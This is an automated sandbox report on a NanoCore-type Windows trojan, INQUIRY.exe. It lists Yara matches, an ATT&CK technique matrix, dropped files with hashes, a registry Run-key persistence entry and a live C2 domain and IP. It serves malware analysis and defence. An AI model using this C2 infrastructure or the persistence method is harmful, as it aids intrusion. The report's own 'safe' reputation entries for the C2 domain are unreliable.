      Source: Yara matchFile source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.382543d.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.3950e14.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.3950e14.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.39a98c0.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.395543d.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.39adee9.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.39a98c0.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.3820e14.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6904, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 7084, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: rstmgknbahw.exe PID: 1904, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: rstmgknbahw.exe PID: 5320, type: MEMORYSTR
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts11
      Native API
      1
      Registry Run Keys / Startup Folder
      112
      Process Injection
      1
      Disable or Modify Tools
      11
      Input Capture
      1
      System Time Discovery
      Remote Services11
      Archive Collected Data
      Exfiltration Over Other Network Medium1
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Registry Run Keys / Startup Folder
      11
      Deobfuscate/Decode Files or Information
      LSASS Memory2
      File and Directory Discovery
      Remote Desktop Protocol11
      Input Capture
      Exfiltration Over Bluetooth1
      Non-Standard Port
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
      Obfuscated Files or Information
      Security Account Manager15
      System Information Discovery
      SMB/Windows Admin Shares1
      Clipboard Data
      Automated Exfiltration1
      Remote Access Software
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)21
      Software Packing
      NTDS21
      Security Software Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer1
      Non-Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Masquerading
      LSA Secrets2
      Process Discovery
      SSHKeyloggingData Transfer Size Limits21
      Application Layer Protocol
      Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common21
      Virtualization/Sandbox Evasion
      Cached Domain Credentials21
      Virtualization/Sandbox Evasion
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items112
      Process Injection
      DCSync1
      Application Window Discovery
      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      Hidden Files and Directories
      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 558450 Sample: INQUIRY.exe Startdate: 24/01/2022 Architecture: WINDOWS Score: 100 36 onyeoma.ddns.net 2->36 42 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 7 other signatures 2->48 7 INQUIRY.exe 1 21 2->7         started        11 rstmgknbahw.exe 17 2->11         started        13 rstmgknbahw.exe 17 2->13         started        signatures3 process4 file5 28 C:\Users\user\AppData\...\rstmgknbahw.exe, PE32 7->28 dropped 30 C:\Users\user\AppData\Local\...\gerys.dll, PE32 7->30 dropped 50 Detected unpacking (creates a PE file in dynamic memory) 7->50 52 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 7->52 54 Injects a PE file into a foreign processes 7->54 15 INQUIRY.exe 9 7->15         started        32 C:\Users\user\AppData\Local\...\gerys.dll, PE32 11->32 dropped 56 Machine Learning detection for dropped file 11->56 20 rstmgknbahw.exe 3 11->20         started        34 C:\Users\user\AppData\Local\...\gerys.dll, PE32 13->34 dropped 22 rstmgknbahw.exe 2 13->22         started        signatures6 process7 dnsIp8 38 onyeoma.ddns.net 185.140.53.6, 4141, 49735, 49742 DAVID_CRAIGGG Sweden 15->38 24 C:\Users\user\AppData\Roaming\...\run.dat, data 15->24 dropped 40 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->40 26 C:\Users\user\AppData\...\rstmgknbahw.exe.log, ASCII 20->26 dropped file9 signatures10

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      INQUIRY.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLinkDownload
      4.0.rstmgknbahw.exe.400000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      1.2.INQUIRY.exe.30e0000.5.unpack100%AviraTR/Patched.Ren.GenDownload File
      2.0.INQUIRY.exe.400000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      2.0.INQUIRY.exe.400000.7.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      6.0.rstmgknbahw.exe.400000.7.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      2.0.INQUIRY.exe.400000.5.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      6.2.rstmgknbahw.exe.4980000.9.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      6.0.rstmgknbahw.exe.400000.9.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      4.2.rstmgknbahw.exe.49d0000.9.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      4.0.rstmgknbahw.exe.400000.9.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      2.0.INQUIRY.exe.400000.9.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      2.0.INQUIRY.exe.400000.11.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      6.0.rstmgknbahw.exe.400000.6.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      6.2.rstmgknbahw.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      6.1.rstmgknbahw.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      6.0.rstmgknbahw.exe.400000.8.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      4.0.rstmgknbahw.exe.400000.11.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      4.0.rstmgknbahw.exe.400000.7.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      4.0.rstmgknbahw.exe.400000.5.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      4.1.rstmgknbahw.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      2.2.INQUIRY.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      2.2.INQUIRY.exe.39a98c0.6.unpack100%AviraTR/NanoCore.fadteDownload File
      6.0.rstmgknbahw.exe.400000.5.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      4.2.rstmgknbahw.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      6.0.rstmgknbahw.exe.400000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      2.2.INQUIRY.exe.2520000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      4.0.rstmgknbahw.exe.400000.8.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      2.0.INQUIRY.exe.400000.6.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      2.0.INQUIRY.exe.400000.8.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      6.0.rstmgknbahw.exe.400000.11.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      4.0.rstmgknbahw.exe.400000.6.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      SourceDetectionScannerLabelLink
      onyeoma.ddns.net0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      onyeoma.ddns.net0%VirustotalBrowse
      onyeoma.ddns.net0%Avira URL Cloudsafe
      127.0.0.10%VirustotalBrowse
      127.0.0.10%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      onyeoma.ddns.net
      185.140.53.6
      truetrueunknown
      NameMaliciousAntivirus DetectionReputation
      onyeoma.ddns.nettrue
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      127.0.0.1true
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://nsis.sf.net/NSIS_Errorrstmgknbahw.exe, rstmgknbahw.exe, 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmp, rstmgknbahw.exe, 00000005.00000000.695461777.0000000000409000.00000008.00020000.sdmp, rstmgknbahw.exe, 00000006.00000000.707759536.0000000000409000.00000008.00020000.sdmp, INQUIRY.exe, rstmgknbahw.exe.1.drfalse
        high
        http://nsis.sf.net/NSIS_ErrorErrorINQUIRY.exe, rstmgknbahw.exe.1.drfalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          185.140.53.6
          onyeoma.ddns.netSweden
          209623DAVID_CRAIGGGtrue
          Joe Sandbox Version:34.0.0 Boulder Opal
          Analysis ID:558450
          Start date:24.01.2022
          Start time:02:23:21
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 10m 26s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:INQUIRY.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:21
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@9/12@20/1
          EGA Information:
          • Successful, ratio: 83.3%
          HDC Information:
          • Successful, ratio: 71.6% (good quality ratio 66.4%)
          • Quality average: 75.8%
          • Quality standard deviation: 31.1%
          HCA Information:
          • Successful, ratio: 85%
          • Number of executed functions: 183
          • Number of non-executed functions: 84
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
          • Execution Graph export aborted for target INQUIRY.exe, PID 7084 because there are no executed function
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          TimeTypeDescription
          02:24:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run earyw C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
          02:24:18API Interceptor962x Sleep call for process: INQUIRY.exe modified
          02:24:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run earyw C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
          02:24:29API Interceptor2x Sleep call for process: rstmgknbahw.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          185.140.53.61FB6ncJ5XP.exeGet hashmaliciousBrowse
            d1IaoX0mpm.exeGet hashmaliciousBrowse
              ORDER LIST.xlsxGet hashmaliciousBrowse
                DeKjb2fKJT.exeGet hashmaliciousBrowse
                  MT103 tek M#U00fc#U015fteri kredi aktarma kopyas#U0131,pdf.exeGet hashmaliciousBrowse
                    DEKONT,pdf.exeGet hashmaliciousBrowse
                      PO 001077 - CS#000310.xlsxGet hashmaliciousBrowse
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        DAVID_CRAIGGGSMS Report.exeGet hashmaliciousBrowse
                        • 185.140.53.134
                        Order confirmation.jarGet hashmaliciousBrowse
                        • 91.193.75.133
                        IMG_4100047645799946532.exeGet hashmaliciousBrowse
                        • 185.140.53.147
                        psrrNeG1IA.exeGet hashmaliciousBrowse
                        • 185.140.53.136
                        New PO #2022.exeGet hashmaliciousBrowse
                        • 185.140.53.178
                        Confirm Invoice Payment.pdf.exeGet hashmaliciousBrowse
                        • 185.140.53.136
                        T4EkbDIoVAPcUMQ.exeGet hashmaliciousBrowse
                        • 185.140.53.15
                        Invoice 20221901.exeGet hashmaliciousBrowse
                        • 185.140.53.178
                        sFW10IJn17.exeGet hashmaliciousBrowse
                        • 185.140.53.146
                        New Price List For DStv&GOtv.pdf.jarGet hashmaliciousBrowse
                        • 91.193.75.133
                        PO#5689.xlsxGet hashmaliciousBrowse
                        • 185.140.53.146
                        GWwW938Bot.exeGet hashmaliciousBrowse
                        • 91.193.75.135
                        Specification_2022.doc__.rtfGet hashmaliciousBrowse
                        • 91.193.75.135
                        Specification_2022.docGet hashmaliciousBrowse
                        • 91.193.75.135
                        G2M18C6INV0ICERECEIPT.vbsGet hashmaliciousBrowse
                        • 185.140.53.10
                        PO#0065026.doc.exeGet hashmaliciousBrowse
                        • 185.140.53.132
                        TT#U007e)9383763563783039847949N.cmd.exeGet hashmaliciousBrowse
                        • 185.140.53.130
                        Viaggitremila order.jarGet hashmaliciousBrowse
                        • 91.193.75.133
                        RFQ_6400056554899993763.exeGet hashmaliciousBrowse
                        • 185.140.53.147
                        RFQ_6400056554899993763.exeGet hashmaliciousBrowse
                        • 185.140.53.147
                        No context
                        No context
                        Process:C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):525
                        Entropy (8bit):5.2874233355119316
                        Encrypted:false
                        SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
                        MD5:61CCF53571C9ABA6511D696CB0D32E45
                        SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
                        SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
                        SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
                        Malicious:true
                        Reputation:high, very likely benign file
                        Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
                        Process:C:\Users\user\Desktop\INQUIRY.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):278527
                        Entropy (8bit):7.986066778609259
                        Encrypted:false
                        SSDEEP:6144:TYEMx0q3EXCouk+eWWP1QbXva183aCT0B/ER78PemFd/1X:TYxZ3Q8Heldu4IaCTm/HX59
                        MD5:16FC364F28AB0F84C023E255CE6B0793
                        SHA1:BD610A8C17B0A5C0C0AF67542F7533271229F584
                        SHA-256:167379B6A1CD5727CCA9F6891B4A58FF06C42490E61D7AE7F8AAFD26F05D1B38
                        SHA-512:D042B54CA997370F3B86FF5567D956489FF7FF9EED92CF5822FE6CDCDB1FB88EC37011E2F6D498BFBD6811CF6C668C0DADD68FFE58642C6B82842B32E2AA75CC
                        Malicious:false
                        Reputation:low
